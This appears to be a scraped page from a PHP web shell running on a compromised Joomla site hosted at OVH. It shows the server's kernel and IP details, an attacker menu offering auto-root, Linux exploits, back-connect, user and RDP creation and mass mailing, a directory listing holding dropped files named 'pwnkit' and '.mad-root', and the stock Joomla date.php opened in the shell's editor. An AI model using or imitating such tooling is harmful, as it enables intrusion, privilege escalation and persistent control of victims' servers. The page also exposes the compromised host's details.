Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
8.56
KB
-rw-r--r--
actionsdropdown.php
5.59
KB
-rw-r--r--
batch.php
5.77
KB
-rw-r--r--
behavior.php
26.19
KB
-rw-r--r--
bootstrap.php
30.89
KB
-rw-r--r--
category.php
4.43
KB
-rw-r--r--
content.php
1.12
KB
-rw-r--r--
contentlanguage.php
1.53
KB
-rw-r--r--
date.php
1.93
KB
-rw-r--r--
dropdown.php
8.79
KB
-rw-r--r--
email.php
3.32
KB
-rw-r--r--
form.php
736
B
-rw-r--r--
formbehavior.php
4.41
KB
-rw-r--r--
grid.php
9.85
KB
-rw-r--r--
html.php
31.3
KB
-rw-r--r--
icons.php
1.52
KB
-rw-r--r--
jgrid.php
16.15
KB
-rw-r--r--
jquery.php
2.95
KB
-rw-r--r--
links.php
2.51
KB
-rw-r--r--
list.php
6.65
KB
-rw-r--r--
menu.php
8.11
KB
-rw-r--r--
number.php
1.52
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rules.php
7.89
KB
-rw-r--r--
searchtools.php
4.09
KB
-rw-r--r--
select.php
27.35
KB
-rw-r--r--
sidebar.php
3.14
KB
-rw-r--r--
sliders.php
3.83
KB
-rw-r--r--
sortablelist.php
3.16
KB
-rw-r--r--
string.php
8.93
KB
-rw-r--r--
tabs.php
2.63
KB
-rw-r--r--
tag.php
6.72
KB
-rw-r--r--
tel.php
2.15
KB
-rw-r--r--
user.php
1.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : date.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Extended Utility class for handling date display. * * @since 2.5 */ abstract class JHtmlDate { /** * Function to convert a static time into a relative measurement * * @param string $date The date to convert * @param string $unit The optional unit of measurement to return * if the value of the diff is greater than one * @param string $time An optional time to compare to, defaults to now * * @return string The converted time string * * @since 2.5 */ public static function relative($date, $unit = null, $time = null) { if (is_null($time)) { // Get now $time = JFactory::getDate('now'); } // Get the difference in seconds between now and the time $diff = strtotime($time) - strtotime($date); // Less than a minute if ($diff < 60) { return JText::_('JLIB_HTML_DATE_RELATIVE_LESSTHANAMINUTE'); } // Round to minutes $diff = round($diff / 60); // 1 to 59 minutes if ($diff < 60 || $unit == 'minute') { return JText::plural('JLIB_HTML_DATE_RELATIVE_MINUTES', $diff); } // Round to hours $diff = round($diff / 60); // 1 to 23 hours if ($diff < 24 || $unit == 'hour') { return JText::plural('JLIB_HTML_DATE_RELATIVE_HOURS', $diff); } // Round to days $diff = round($diff / 24); // 1 to 6 days if ($diff < 7 || $unit == 'day') { return JText::plural('JLIB_HTML_DATE_RELATIVE_DAYS', $diff); } // Round to weeks $diff = round($diff / 7); // 1 to 4 weeks if ($diff <= 4 || $unit == 'week') { return JText::plural('JLIB_HTML_DATE_RELATIVE_WEEKS', $diff); } // Over a month, return the absolute time return JHtml::_('date', $date); } }
Close